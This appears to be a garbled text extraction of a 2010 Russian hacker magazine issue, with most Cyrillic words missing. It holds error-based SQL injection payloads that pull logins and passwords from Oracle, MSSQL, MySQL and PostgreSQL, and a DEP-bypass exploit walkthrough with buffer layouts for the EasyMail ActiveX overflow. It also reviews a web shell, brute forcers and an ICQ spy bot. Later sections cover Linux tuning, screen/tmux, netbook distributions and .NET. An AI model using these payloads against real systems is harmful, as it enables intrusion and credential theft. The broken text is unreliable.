ORA-19202: Error occurred in XML
processing
LPX-00210: expected '<' instead
of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line
301
ORA-06512: at line 1
no rows selected
SQL>
. substr()
. ,
:
select XMLType((select
substr(version,1,1) from
v$instance)) from users;
select XMLType((select
066
substr(version,2,1) from
v$instance)) from users;
select XMLType((select
substr(version,3,1) from
v$instance)) from users;
... ..
,
limit offset,
. , XMLType()
XMLTYPE()
SQL-
, ,
.
XMLType(),
,
:
SQL> select XMLType((select
'<abcdef:root>' from dual)) from
dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00234: namespace prefix
"abcdef" is not declared
...
SQL> select XMLType((select
.
,
at ("@") .
;) upper().
, :
select id
rnum from
select id
rnum from
...
from(select id,rownum
users a)where rnum=1;
from(select id,rownum
users a)where rnum=2;
, , ,
hex-. ,
X 04 /135/ 10
blind SQLi PostgreSQL
MSSQL: /?param=1
and(1)=convert(int,@@version)--
chr(58)||(select+rawtohex(login||c
hr(58)||chr(58)||password)from(sel
ect+login,password,rownum+rnum+fro
m+users+a)where+rnum=1)||chr(62)))
from dual)--
SQL , ,
:
Sybase: /?param=1
and(1)=convert(int,@@version)-MySQL>=4.1<5.0: /?param=(1)
and(select 1 from(select count
(*),concat(version(),floor(ran
d(0)*2))x from TABLE_NAME group
by x)a)-
/?param=1 and row(1,1)>(select co
unt(*),concat(version(),0x3a,floor
(rand()*2))x from (select 1 union
select 2)a group by x limit 1)--
MySQL>=5.0: /?param=(1)and(select
1 from(select count(*),concat(v
ersion(),floor(rand(0)*2))x from
information_schema.tables group
by x)a)--
admin::P@ssw0rd
SQL>
,
error-based
blind SQL Injection :
PostgreSQL, MSSQL, Sybase,
MySQL >=4.1 Oracle >=9.0.
http-, :
PostgreSQL: /?param=1
and(1)=cast(version() as
numeric)--
,
- .
, ,
SQL .
.
, z !
067
Digital Security, dookie@inbox.ru
,
,
.
DEP
HARDWARE-DEP
,
DEP.
,
. DEP
, ,
.
ActiveX
IE6/IE7,
QuickSoft EasyMail Object
,
. ,
SubmitToExpress() 256
, ESI,
SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD
,
heap-spray
SEH CALL [ESI+CC]
.
068
, ,
DEP (Data Execution Prevention),
, .
ActiveX, DEP,
, ASLR (Address space
layout randomization), ,
.
.
,
DEP , ,
.
, DEP ,
Microsoft,
NX/XD (,
AMD NX, Intel XD)
. , ,
.
- , EIP
,
(, ,
). ,
DEP
NX/DX Windows c (>= Windows XP SP2).
Microsoft ,
software-DEP.
. , ,
/ .
SEH .
SafeSEH,
DEP.
ACCESS VIOLATION
, DEP?
? , , DEP.
,
. BIOS
,
. Intel Core2
Duo , . , ,
software-DEP
( NX/XD ,
X 04 /135/ 10
DEP
,
E Access.
DEP IS DEAD
DX
/noexecute=OptOut
Windows Server 2003 SP1. DEP
,
.
/noexecute=AlwaysOn DEP
, .
/noexecute=AlwaysOff DEP (
).
.
SysInternals Process Explorer
.
software-DEP OptOut, IE7 . ,
, SEH
, ,
,
.
.
, ,
CALL . ,
X 04 /135/ 10
SEH
.
, ( ), CALL
[ESI+CC] ,
software-DEP. ,
, ,
,
SEH- (
heap-spray.
, software-DEP,
, hardware-DEP
( NX/
XD). , , SEH
,
. ,
, NOP
Access
violation when executing [0D0D0D0D]. , ,
JavaScript heap-spray,
.
,
,
DEP. ,
ret2libc.
, .
, ,
, ,
, WinExec. ,
WinExec
! ,
,
,
-, ,
/ ,
/
cmd.exe ( ). ,
.
-. , ,
- . 2005
DEP .
,
VirtualAlloc() .
, ,
,
( , ),
,
. memcpy(),
.
memcpy(), ,
.
, ,
, .
069
IN PVOID ProcessInformation,
//
DEP ,
0x0000002
IN ULONG
ProcessInformationLength
// (0x4) 4
);
DEP
! , ?
Skape Skywing
ntdll.dll:
Address1:
cmp al,0x1 ; EAX=1 ?
Process Explorer
DEP
VirtualProtect(). , ,
, VirtualProtect()
(
, 0x000040 RWX)
. .
VirtualProtect(
IN
LPVOID lpAddress,
// 0x0D0D0D0D
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// - 0x40
IN
PDWORD lpflOldProtect
// , ,
( ),
0x05050505
);
070
VirtualProtect
. Windows
API DEP? Windows
XP SP3 ( )
API SetProcessDEPolicy(),
- DEP. , -,
. .
SetProcessDEPolicy()
NtSetInformationProcess():
NtSetInformationProcess
(
IN HANDLE ProcessHandle,
// , 0xff
IN PROCESS_INFORMATION_CLASS
ProcessInformationClass,
// 0x22
DEP -
push eax ;
0x2
push 0x22 ; 0x22
push 0xff ; 0xff (-1)
call NtSetInformationProcess
; ,
; DEP
jmp
LdrpCheckNXCompatibility +
0x5c ; ...
. . .
pop esi
leave ;
ret
0x4 ; 4
, ,
( AL )
DEP ,
. ,
,
LEAVE ,
, , ESP = EBP. ,
EAX 1. ,
,
1. , , , AL
, ntdll.dll:
. . .
Address2
mov
al,0x1
ret
0x4
retn 8. :
(Ctrl+S):
al,1
retn 0x4
Address2.
Address1 :
cmp
push
pop
al,0x1
0x2
esi
FIGHT!
.
,
EBP 0x4646464646 ,
(BBBB). DEP,
EBP 0x2:
mov
, ,
. ,
ESI. , ,
, CMP
[ESI+180],1. :
xor ebx, ebx ;
push -1
cmp [ESI+],EBX ; 0
CALL [ESI+CC], .
, ,
ESI+CC 0. ,
0, ret
:
call emsmtp.026c6232 ;
xor eax,eax ;
pop edi ;
, :
cccc260ccccAAAAffffBBBBCCCCXXXXX
XXX100XXXXXXXXXXX
AAAA=0x05050505
BBBB=Address2
CCCC=Address1
X=0x0D
cccc260ccccAAAAffffBBBBffffffffC
CCCXXXXXXXX100XXXXXXXXXXX
pop esi
pop ebx
leave
;
retn 0x8
;
(AAAA)
,
,
, NOP .
ESI 0x05050505, 0 ,
,
BBBB CCCC, BBBB
[ebp-0x4],esi
, ,
, , leave NtSetInformationProcess!
,
(BBBB ),
,
. , ActiveX
ASCII .
0x7C, ActiveX ? 0x3F.
,
0x7C. DEP,
ActiveX. ,
CALL [ESI+CC] ,
.
, , ESI+CC
,
, .
,
! CALL .
.
: CALL
DEP,
, . CALL
AL , ,
je LdrpCheckNXCompatibility+0x1a
DEP.
, CALL,
ActiveX,
MultiByteToWideChar(). , Z
. ? ,
,
je. Z=1,
071
, . ,
CMP AL,1,
2 , , PUSH 2.
, je
DEP. ,
. :
cccc260ccccAAAAffffBBBB
AAAA = 0x05050505 ,
Address1
BBBB = 0x0D0D0D0D ,
, ,
Address1 . , 0x7C91CD26.
ntdll.dll.
, ,
, DEP.
,
, .
0x0D0D0D0D ,
,
, ,
CALL[ESI+CC] (0x050505D1) ,
, 0x267C91CD.
, : 36 .
36 ,
. 4 . ,
,
( ,
). ,
,
NtSetInformationProcess
072
DEP
, ,
0xXXYY0000. ,
0xXXYY0024 (
+ 4 ).
0x4, +0xCC
, 0xD1.
0x3
0x05050508.
,
little-endian .
(
DVD).
DEP
,
.
,
,
, DEP. , ,
, Z
CALL ,
,
,
ret2libc .
(ASLR),
VirtualProtect
NtSetInformationProcess. .
, IE8 DEP .
, IE8
DEP (
SetProcessDEPPolicy).
DEP-
ret2libc,
NtSetInformationProcess
. , ,
,
BlackHat 2010 DC,
(Dionysus Blazakis) IE8 ASLR( ) DEP. ActionScript Java,
.
JIT-spray,
z
X 04 /135/ 10
icq 884888
X-TOOLS
: ProxFetch
: *NIX/WIN
: X1MACHINE
:).
K-Shell
, ASP.NET
, IIS.
K-Shell
, PHP:
K-Shell
(, ,
, ..). ,
,
,
ProxFetch x1machine.com.
, ProxFetch
,
,
,
ip . :
;
c++,
;
;
;
;
GeoIP;
;
-;
TOR;
.
ProxFetch
x1machine.com/?p=72.
: K-SHELL
: WINDOWS 2000/2003/XP/VISTA/7
: KIKICOCO
074
(md5);
( CMD.NET,
W32, WSH, SQLServer);
( );
(Server IP, Machine Name, Network
Name, User Name ,
OS Version, System Time, IIS,
, ,
, );
/;
;
;
IIS;
;
event ;
(, , ,
, , ,
, );
.
,
.
: ICQ EXAMBOT
: WINDOWS 2000/2003/XP/VISTA/7
: WWW.NAKODIM.RU
-?
ICQ Exambot
nakodim.ru.
icq-,
-
.
,
5000 (1200 ICQ).
,
.
,
( .NET Framework 2.0).
! :)
(
:),
Dr.TRO, Perl.
:
perl brute.pl <threads> <proxy
change time> <pause> <anticaptcha
key> <accounts file> <passwords
file> <proxy file> <nobad> <spliter>
:
<threads> ;
<proxy change time>
,
;
<pause>
;
<anticaptcha key> ;
X 04 /135/ 10
<accounts file>
;
<passwords file>
;
<proxy file> ;
<nobad> ;
<spliter>
.
!
AntiCaptcha.
pm, .
: [ WEB ] BRUTE
FORCER V1.1
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND
, basic-
-?
- 1' or 1=1/*,
. [ Web ] Brute Forcer
[x26]VOLAND
:).
:
POST;
GET;
basic-
HEAD;
FTP;
( 1 1000 );
REQUEST ;
Cookies;
( );
3 (1 , , 1 );
plain HTML
input , ;
(,
, ).
X 04 /135/ 10
-
,
- .
<form>.
action url
URL. method
/ .
<form>
<input> ( ).
, ,
.
<input> name.
login, nickname,
username .., .
name
.
.
( name value) request-.
<form> <input>
type=submit, . Submit-.
- <input>
name, .
. ,
.
, (
/
, ).
(
), ,
, ,
(
).
( ) ,
. Enjoy!
,
forum.antichat.ru/thread109600.html.:)
/
ICQ SPY BOT.
,
.
:
;
;
;
;
;
( 800 );
ICQ ;
;
IP ;
;
;
;
PID;
;
;
;
url;
;
;
.
,
.
,
,
:). z
075
Mifrill maria.nefedova@glc.ru
2010
-
2009 , , lan- .
,
, ,
.
,
CAROLINACON
: 19 21
: ,
: www.carolinacon.org
CarolinaCon
2005 ,
.
,
,
Microsoft, Intel
. CarolinaCon
2600.
?
. ,
,
074
076
. , ,
, , ,
- . ,
, 2010
.
,
.
:
Linux ?,
, , ,
OMG! !!!.
,
, .
CANSECWEST
: 20 26
: ,
: cansecwest.com
,
?
,
,
CanSecWest.
, ,
, IT-.
, , , .
(, ) ,
, ,
. ,
.
X 04 /135/ 10
: 8 9
: -,
: developers.sun.ru/techdays2010
Sun, .
, ,
Java,
.
: 19 22 ; 29
2
: , ; ,
: www.hackinthebox.org
. ,
, ,
IT-
.
,
HITB, , . , , ,
.
HITB Dubai,
, , , .
077
: .
,
.
, -,
McAfee;
TEHTRI-Security
;
. ,
.
BLACKHAT EUROPE
: 12 15
: ,
: www.blackhat.com
BlackHat, , ,
, .
BlackHat
.
13 . ,
BlackHat Europe.
,
,
: SAP ,
Adobe Flash, PDF Adobe Reader ,
,
ZIP, 7ZIP, RAR, CAB.
:
,
Fortinet Inc., Invisible
Things Lab,
Trustwave Spiderlabs, Context
Information Security .
:
078
HOPE.
, ,
, .
,
,
, ,
. , ,
BlackHat ,
-,
IEEE 802.11, TCP/IP .
NOTACON
: 15 18
: ,
: www.notacon.org
Notacon
,
, .
, , 2003
, ,
,
.
, ,
, ,
; , ,
,
,
. ,
Notacon
, , , .
, , ,
.
BLACKHAT USA
: 24 29
: -,
: www.blackhat.com
BlackHat
, - -. ,
,
, ,
.
, IT-,
.
, BlackHat 2010 ,
,
,
, BlackHat
2010 .
HACKERS ON PLANET
EARTH (HOPE)
: 16 18
: -,
: thenexthope.org
X 04 /135/ 10
HITB'09
!
Hacker Quarterly,
.
HOPE
,
. ,
:
HOPE: Hackers On Planet Earth, Beyond HOPE,
H2K, H2K2, The Fifth HOPE, HOPE Number
Six, 2008
The Last HOPE.
08
2010- The
Next HOPE,
.
, ,
, - ( ).
-, Cult of the Dead Cow.
, ,
,
. ,
,
.
ASSEMBLY
:
: (),
: www.assembly.org
. Assembly
-
1992 .
, Assembly (X 04 /135/ 10
DEFCON , , ..
.
HUMAN .
9 .
) -
5000 .
,
-
, ,
.
2007 Assembly
: Assembly Winter,
, ,
( -);
Assembly Summer
,
. - ,
.
Assemly Winter10, , ,
, - . Asembly Summer
,
.
, , ,
.
DEFCON
: 30 1
: -,
: www.defcon.org
-,
IT-. DEFCON
,
.
,
18
, :).
DEFCON
,
HACKERS
ON PLANET EARTH.
,
, ,
,
. DEFCON 18
:
,
15
, , ; IT
,
,
, DEFCON!;
, ,
, , ,
, , p2p .
,
.
CHAOS CONSTRUCTIONS
:
: - (),
: cc.org.ru
Chaos Constructions, CC,
,
, CC
1995 .
, , -,
,
, , . Chaos
Constructions
,
, -,
.
\ , ,
,
,
. Chaos Constructions, , ,
,
.
CC10 ,
, ,
, . z
079
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,
, , ,
. ,
( )
, .
,
.
,
(, , ). ,
:
. , 4 2 ,
,
.
,
( ).
080
.
,
.
Linux
/proc /sys. ,
,
. ,
:
$ cat /sys/devices/system/cpu/cpu0/
cpufreq/scaling_governor
,
:
cpufreq 11
, ,
. :
$ ls -1 /sys/devices/system/cpu/
cpu0/cpufreq
affected_cpus ,
cpuinfo_cur_freq
cpuinfo_max_freq
cpuinfo_min_freq
scaling_available_frequencies
X 04 /135/ 10
cpufreq-info,
: , ,
.. :
$ sudo cpufreq-set -g powersave
'-f':
cpufreq-info
scaling_available_governors
scaling_driver
scaling_governor
scaling_max_freq
,
scaling_min_freq
,
scaling_setspeed
,
Linux,
:
1.
,
. ,
,
cpufreq.
:
acpi-cpufreq ACPI (P-States Driver)
p4-clockmod Pentium 4
speedstep-centrino Pentium M
speedstep-ich Pentium III-M, P4-M, ICH2/
ICH3/ICH4
speedstep-smi Pentium III-M, 440 BX/ZX/MX
powernow-k6 AMD K6
powernow-k7 AMD Athlon
powernow-k8 AMD Opteron, Athlon 64,
Athlon64X2, Turion 64
cpufreq-nforce2 nVidia nForce2 ( FSB
PCI/AGP)
,
.
2.
, -
. Linux
:
X 04 /135/ 10
1. performance ,
,
.
2. ondemand .
3. conservative ondemand,
( ,
).
4. powersave .
5. userspace ,
.
,
:
GOVERNOR /etc/init.d/
cpufrequtils (
ondemand).
,
.
,
.
fancontrol
lm-sensors.
,
lm-sensors, ,
sensors-detect.
<Enter>.
Do you want to add these lines automatically?,
yes,
modprobe.
:
# modprobe cpufreq_ondemand
scaling_governor:
# echo ondemand > /sys/devices/
system/cpu/cpu0/cpufreq/scaling_
governor
.
ondemand ,
, ,
, . ,
. ,
userspace,
scaling_setspeed:
# echo 1000 > /sys/devices/system/
cpu/cpu0/cpufreq/scaling_setspeed
scaling_
available_frequencies. ,
, cpufrequtils,
. Debian/Ubuntu:
$ sudo apt-get install cpufrequtils
, sensors.
,
.
CPU Fan CPU Temp,
.
( 4000 ),
( 60 ).
. ,
fancontrol,
, .
,
pwmconfig,
.
pwmconfig <Enter>
. ,
Select fan output to configure, or other
action:, 1
.
,
,
081
UNIXOID
hdparm:
. ,
,
.
, ,
.
,
<Enter>,
.
pwmconfig
, , , fancontrol:
$ sudo /etc/init.d/fancontrol start
, fancontrol
(
),
. ,
Acer Aspire One
acerhdf (www.piie.
net/?section=acerhdf).
Sony Vaio Fan Silencer (www.taimila.
com/fansilencer.php). ,
.
, , -
,
, .
:
,
,
( 3D-).
,
.
. nVidia,
Linux nvclock (www.
linuxhardware.org/nvclock).
,
082
,
.
'-i'
-- Sensor info --,
.
nvclock '-f' '-F',
:
$ sudo nvclock -f -F 60
10 100
10. ,
.
, .
, ,
. , ,
.
?
, .
,
,
.
,
.
,
. :
,
, .
,
.
,
,
, .
,
.
nvclock , ,
, /etc/fstab ( swap
).
, ext4,
,
.
, , Linux
,
. ext2, ext4, reiserfs, , ,
FAT, .
,
defrag (http://ck.kolivas.org/apps/defrag)
Shake (http://vleu.net/shake). .
(shake-0.99.1-Linux.sh),
.
, , .
Debian Ubuntu
apt,
http://vleu.
net/apt.
,
:
$ sudo shake -pvv ///
5
15
.
.
.
.
X 04 /135/ 10
( )
. ,
,
.
-
.
, Linux
,
.
/proc/sys/vm:
$ ls -1 /proc/sys/vm
laptop_mode (120)
-
(
,
?).
dirty_writeback_centisecs (12000)
.
dirty_expire_centisecs (12000)
.
dirty_ratio (10) , (
).
dirty_background_ratio (1) ,
.
, .
sensors lm-sensors
,
.
, ,
,
,
.
hdparm. , :
$ sudo hdparm -B 1 -S 12 /dev/sda
'-B 1'
. 254, 1
pwmconfig
127 ,
.
'-S 12' , .
255 : 1 240
5 , 0 .
Automatic Acoustic Management,
,
(, , 10%).
-
hdparm. :
$ sudo hdparm -M 128 /dev/sda
, 254.
,
/,
,
(, 128 , 254 , ,
, ,
).
,
,
, . ,
, ,
.z
X 04 /135/ 10
083
UNIXOID
zobni n@gmail.com
GNU Screen
tmux
X 04 /135/ 10
tmux
?
, , SSH-.
,
,
.
.
, .
<Ctrl+Z>,
,
, jobs. SSH-
, .
?
Screen
. ,
Screen , SSH-
. ,
screen, .
less /
var/log/messages, <Ctrl+A C>, , top,
irssi ..
<Ctrl+A P>
.
SSH-.
Screen .
<Ctrl+A D>,
Screen 'r',
. ,
X 04 /135/ 10
-,
,
. ,
.
, Screen.
,
mutt alpine
.
, X- ,
GTK- QT- .
, ,
, ,
(, ()
, ratpoison, ion3 dwm,
Screen).
?
Screen. .
-, ,
,
. -, Screen
,
..,
,
.
, ,
,
. ~/.screenrc
:
$ vi ~/.screenrc
#
startup_message off
# utf8
defutf8 on
#
( )
vbell on
#
defscrollback 1000
#
autodetach on
# Login-
shell -$SHELL
# xterm (
)
termcapinfo xterm* ti@:te@
#
shelltitle '$ |sh'
#
hardstatus alwayslastline "%{+b wk}
%c $LOGNAME@%H %=[ %w ] "
# <Esc>
su
bind \033 screen -ln -t root 9 su
.
. Screen
.
:
.
, , Screen
,
shelltitle. '$ |sh',
,
,
'$ ' (
), sh (
).
.
, ~/.bashrc:
case $TERM in
screen)
export PROMPT_COMMAND = 'echo -n
-e "\033k\033\\"'
;;
esac
,
(hardstatus). Screen ,
.
:
12:18 user@hostname [ 0 sh 1 mc 2* irssi ]
085
UNIXOID
Screen
tmux
_@_,
.
.
Screen
, ,
(
PS1). screen,
.
<Esc>
root-.
Screen
, .
- ,
, .
.
, ,
Screen
<Ctrl+A> (<C-a>
Screen),
- .
<C-a c>
,
.
:
Screen
C-a 0..9
0..9
C-a "
C-a n
C-a p
C-a c
C-a k
C-a C-a
C-a S
C-a |
C-a Tab
C-a z
C-a d
screen
C-a M
C-a ?
C-a :
Screen
TMUX:
set -g lock-after-time 1800
set-password -c '$2a$06$7LpuTSfDjcz.KD3a9mdEuuJmC.zEq6RBqHWMjdv9/qqzrfWedUBHe'
bind L lock-server
086
. , ,
watch. Screen
. <C-a C-[>
.
<C-a C-]> .
<C-a h> Screen ,
less. :
hardcopy._. ,
bind .
, ""
<C-a Space>
:
bind ' ' windowlist -b
, <C-a S>
:
bind S split
:
bind m screen -t mail mutt
<C-a m>
mail,
mutt.
Screen:
screen -t mail 0 mutt
screen -t irc 1 irssi
screen -t google 2 elinks http://
www.google.com
~/.screenrc
Screen,
mutt, irssi
elinks.
SCREEN'
4.6 OpenBSD Screen
X 04 /135/ 10
tmux ,
,
, . , :
$ tmux last-window
:
$ tmux new-window
Screen
tmux ,
,
bind,
,
tmux
.
tmux
. set-option
, set-window-option
.
(set setw),
'-g'.
, , , ,
. :
$ tmux show-options
$ tmux show-window-options
WARNING
warning
tmux
15 (
),
,
.
man-. , :
$ vi ~/.tmux.conf
#
set -g status-bg white
#
set -g status-right '#(echo $USER)@#H #(uptime
| cut -d "," -f 1)'
#
vi
set -g status-keys vi
setw -g mode-keys vi
#
set -g history-limit 1000
# <C-a>
set -g prefix C-a
unbind C-b
# <C-a C-a>
bind C-a last-window
# <C-a M>
bind M setw monitor-activity on
# <C-a /> top
bind / neww 'exec top'
INFO
info
<C-b t> tmux
, .
.
$ tmux list-commands
X 04 /135/ 10
087
UNIXOID
ADEPT ADEPTG@GMAIL.COM
:
status-left status-right. , .
Screen, :
#()
( )
#H
#S
#T
## #
, ,
. @, ,
echo $USER
( ), uptime | cut -d "," -f 1 ( )
#H.
bind new-window (neww).
, , . , tmux
attach, , ,
mutt, irssi:
tmux
2010- UNIX
, 3D-.
, UNIX
, .
(
).
elinks (http://elinks.or.cz).
, ,
, , JavaScript, , ,
, (Perl, Lua, Guile).
alpine (www.washington.edu/alpine). .
pine. ,
.
mutt, , ,
.
IM- centerim (www.centerim.org/index.php/Main_Page).
IM- centericq. .
: ICQ, Yahoo!, AIM TOC, IRC, MSN, Gadu-Gadu
Jabber. ,
.
Twitter- ttytter (www.floodgap.com/software/ttytter). Twitter-, Perl.
( ,
).
sdcv (http://sdcv.sourceforge.net).
StarDict.
.
088
new -d
neww -d mutt
neww -d irssi
new-session,
. .
'-d' , tmux
.
tmux. Screen,
<C-b ">, <C-b o>, <C-b>
. <C-b Alt-Up> <C-b Alt-Down>.
, <C-b Space>. ,
, , ,
. ,
.
centerim
X 04 /135/ 10
DVD
dvd
screen tmux,
HTTP://WWW
links
http://cli-apps.org
, GNU Screen
tmux, .
X 04 /135/ 10
,
,
, . z
089
UNIXOID
Adept adeptg@gmail.com
Linux
-
, Linux,
( Windows 7
Starter, ). ,
! - /SSD 4 .
LET'S MORTAL KOMBAT BEGIN
(
Asus Eee
PC 701) , ,
,
,
.
- .
-
090
x86- , Gentoo Atom'
. ,
:
,
. 10"
Gnome/KDE -
, 7"
.
X 04 /135/ 10
- Chromium OS
.
,
,
OpenOffice :).
, , , , ,
? , :
Ubuntu Netbook Remix
;
Lenovo ideapad s10-2
:
MOBLIN VIRTUALBOX
, Moblin ,
VirtualBox. :
1. img iso.
2. , IO APIC PAE/NX. .
3. , Moblin ( Live-
, ).
4. <F1> GRUB. , quiet vga=current, 3,
runlevel.
5. /etc/inittab,
/usr/sbin/moblin-dm /usr/bin/startx.
Hint: Moblin 2.1 VirtualBox 3.1 :).
X 04 /135/ 10
: 10.1", 1024x600;
: Intel Atom N270 1.6 ;
: Intel GMA950;
: 1 ;
: 160 ;
: 10/100 / Ethernet, 802.11b/g, WiMAX.
, ,
.
Ubuntu Netbook Remix (UNR)
Ubuntu Canonical
( , Ubuntu Moblin, ).
Ubuntu -
,
, . 10.04
, Gimp Tomboy.
, .
: Intel
Atom, 512 4
, , .
-
3 : ,
091
UNIXOID
MOBLIN
Moblin , , .
Ubuntu:
Moblin . ppa (https://launchpad.
net/~moblin/+archive/ppa). , ppa .
Debian:
Moblin testing unstable. ( tasksel) , . :
# apt-get install gtk2-engines-moblin moblin-cursor-theme moblinicon-theme moblin-sound-theme moblin-menus moblin-panel-applications
moblin-panel-media moblin-panel-myzone moblin-panel-pasteboard
moblin-panel-people moblin-panel-status moblin-session mutter-moblin
Fedora:
# yum groupinstall "Moblin Desktop Environment"
Mandriva:
# urpmi task-moblin
OpenSUSE:
Moblin 2.1 OpenSUSE 11.2
.
.
42 (
), 15,
4 ( VIA,
Intel GMA 500). , 4
,
community :).
, ,
9.10. 2010,
Ubuntu,
10.04.
, Ubuntu,
. :
Desktop Switcher,
Gnome'
Netbook Remix.
UNR Launcher
Gnome.
. (Favorites),
.
Go Home
UNR Launcher.
,
UNR
Launcher.
Window Picker
Gnome, ,
.
,
.
Maximus
. .
UNR , , . :
Easypeasy , UNR
( .. : Skype, , ),
.
1.5, Ubuntu 9.04.
CHROMIUM OS
Chrome OS (, Chromium OS)
Ubuntu 9.10, :
1. : <Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt
3. rw:
$ sudo mount -o remount,rw /
4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic main restricted" | \
sudo tee -a /etc/apt/sources.list
5. :
$ sudo apt-get update
092
,
Chromium OS
Eeebuntu NBR UNR,
Asus Eee PC (
). . NBR (Netbook Remix),
Standart ( Gnome),
Base (
) LXDE (, LXDE
).
3,
Ubuntu 9.04. 4 Debian
Unstable.
Leeenux Easypeasy ,
. 7" (Asus Eee
PC 701),
1,2 . 31 2.0 (
Easypeasy 1.5),
3.0, UNR
9.10.
Moblin' ,
-.
(, twitter last.fm).
12 :
MyZone , ,
;
Status
;
People ;
Internet , Firefox 3.5. -
;
Media / . -
;
Pasteboard ;
Applications (
) ;
Zones (
<Alt+Tab>);
4 , , Bluetooth .
, Moblin
-, . ,
:
ext4,
2.6.31;
GUI-
(Connman)
, IP- ( DHCP);
-
;
/
;
.
mc! :)
X 04 /135/ 10
,
Google. ,
( Chromium OS www.
chromium.org/chromium-os)
Live CD/USB.
LiveUSB Chromium OS Zero (http://chromeos.
hexxeh.net).
, , ,
Chrome OS Google Google Google.
. ? !
Google Docs. ? Google Mail! IM-?
Google Talk! , (
Chromium OS Ubuntu)!
INFO
info
MID (Mobile Internet
Device)
(
4-7 ),
,
,
-.
SSSE3
(Supplemental
Streaming SIMD
Extension 3)
,
Intel'
.
SSE3,
32
,
.
,
Chromium
OS
,
.
Google,
Chrome
OS (
x86, ARM
)
2010.
093
UNIXOID
Moblin
:
Google
.
.
Chromium OS
Google ,
7 .
,
.
Chrome OS
, -
.
// .
(
:) ) (, ),
.
, /
.
Google- ( , ,
).
(, Google Chrome)
Google Mail.
Chrome (
).
,
. , ,
,
,
:). Chromium
OS 19 : ,
Google ,
Yahoo! Mail Hotmail.
(, , )
. <F8>,
.
, :
<Ctrl+Alt+T> ,
!
, Chromium
OS ,
( ,
Ubuntu). wiki- 15
.
, -, ,
Google , .
(, CAD- -
?)
.
Moblin
094
X 04 /135/ 10
Jolicloud
, Google.
. -
$4.2
. Ubuntu,
- Debian - JoliCloud, -
Ubuntu Netbook Remix Chromium OS. ,
, , -, Google.
:
ISO- ( LiveCD).
JoliCloud , ,
Ubuntu.
Windows ( XP
7).
, . /
. !
( Intel GMA500 VIA
C7M). , JoliCloud 98%
. 75 /, 7
3 . 98%
:).
.
JoliCloud-. :
.
, Web- Mozilla Prism.
JoliCloud.
.
JoliCloud (- )
, .
-,
(
, ).
, , JoliCloud-,
UNR:
;
X 04 /135/ 10
Jolicloud.
4 , , , .
Ubuntu Netbook Remix Ubuntu,
(
-- Ubuntu One).
, .
,
.
Moblin ,
. -
IRC. ,
(. Moblin
).
Google Chrome (Chromium) ,
. .
Google Groups (chromium-os-*)
IRC. , .
Jolicloud .
,
. ,
, ,
Windows , Linux-.
(www.techreviewonlineforum.
com/jolicloud-forum-f17.html), Facebook
( 5000 ) twitter (http://twitter.com/
jolicloud).
Linux . z
DVD
dvd
.
HTTP://WWW
links
:
www.ubuntu.com
moblin.org
www.chromium.org
www.jolicloud.com
:
www.phoronix.com/
scan.php?page=
article&item=
chromium_moblin_
benchmarks
095
CODING
c0n Difesa condifesa@gmail.com) http://defec.ru
.NET REMOTING:
GRID-
(), , - .
,
.
. ,
,
.
.
,
:
, , ,
. -
,
,
. ,
( ,
).
.
, , ,
.
096
, ,
.
. , ,
.
.
- ( . grid ,
) , , (), . ,
.
,
, ,
.
, ,
.
, (,
)
, .
, .
,
. ,
,
, . , ( ) ,
.
, ;).
,
.
(dedicated servers)
;). ,
, MD5, -,
, ,
.
.
? !
-
, .NET .
, .
, .NET
,
. , .NET Remoting. ,
- ,
C#, , , (,
, ..). ,
, , .
, ,
( -).
- ,
, ,
. :
, . , . ,
,
.NET Remoting .
( 39993),
, .
:
,
, ,
. , ,
, :
, , , .
:
.
Microsoft
: , ,
. :
X 04 /135/ 10
, , ,
.
, , -.
(remoting)
//
39993
TcpServerChannel channel=new
TcpServerChannel(39993);
ChannelServices.RegisterChannel(channel);
//
RemotingConfiguration.
RegisterWellKnownServiceType(
typeof(Bot),//
"Bot", //URI
//
WellKnownObjectMode.SingleCall);
INFO
info
:
hash.txt
,
distribute.exe
client.exe.
DVD
dvd
Microsoft
Visual Studio 2008.
URI .
( , TCP)
, .
(localhost,
IP- ) , Bot ,
. URI
,
( , 39993).
097
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
: , Bot ,
System.MarshalByRefObject:
public class Bot:MarshalByRefObject
{
...
}
,
, .
, :
Bot brain = new Bot();
brain , ,
,
, .
, ( )
. ,
, , (
, ), .
,
.
():
//-
int Core=(Int32)System.
Environment.ProcessorCount;
// ()
int Takt=(Int32)Registry.GetValue(
@"HKEY_LOCAL_MACHINE\
HARDWARE\DESCRIPTION\System\
CentralProcessor\0", "~MHz", 0);
098
,
,
() :
int RangeValue = Core * Takt * 9;
//
,
(
) .
:
1. ;
2. ;
3.
.
() .
1-3;
4.
.
, , , .
,
,
. , :
.
.
, .
,
. ,
, ,
abcde39# .
( !zxcv4M
1234567). n- ,
1.
;).
Bot. GetJob(int
<__>).
,
brain GetJob:
brain.GetJob(" ");
, , , .
,
.
:
,
,
.
,
,
-
,
a.k.a John the Ripper.
/pen-/security-
, . ,
,
,
, ? : -
,
( ;)) ,
.
:
,
. , MD5-.
,
! z
X 04 /135/ 10
stannic.man@gmail.com
.NET
.NET FRAMEWORK
, .NET-
, , ,
.NET Framework
Win32-.
.NET- , ,
PE-.
, PE-
, runtime-
CLR. , .NET
CLR. .NET ,
mscoree.dll
_CoreExeMain. ,
, .NET .
,
.NET
_CoreExeMain .
, .NET- ,
,
.NET-
.
,
, .
.NET
Framework?
-, X 04 /135/ 10
. ,
.NET .
CLR ,
.
.
(reflection).
.NET Framework
, ( CLR) .
, -,
,
MSIL-, .
.
Visual Studio ,
.
,
Visual Studio.NET,
IntelliSense.
IntelliSense , ,
. Visual Studio.NET
, .
CLR
, , .
,
.
.
,
, , .
,
,
.
, .
(
)?
?
, .
:
TypeDef ,
MethodDef, PropertyDef
EventDef, ,
.
MethodDef
, . FieldDef,
ParamDef, PropertyDef EventDef, ,
, , , ,
.
, AssemblyRef,
,
, ModuleRef
099
CODING
CorDbg
INFO
info
ILDASM
(call stack)
microsoft.
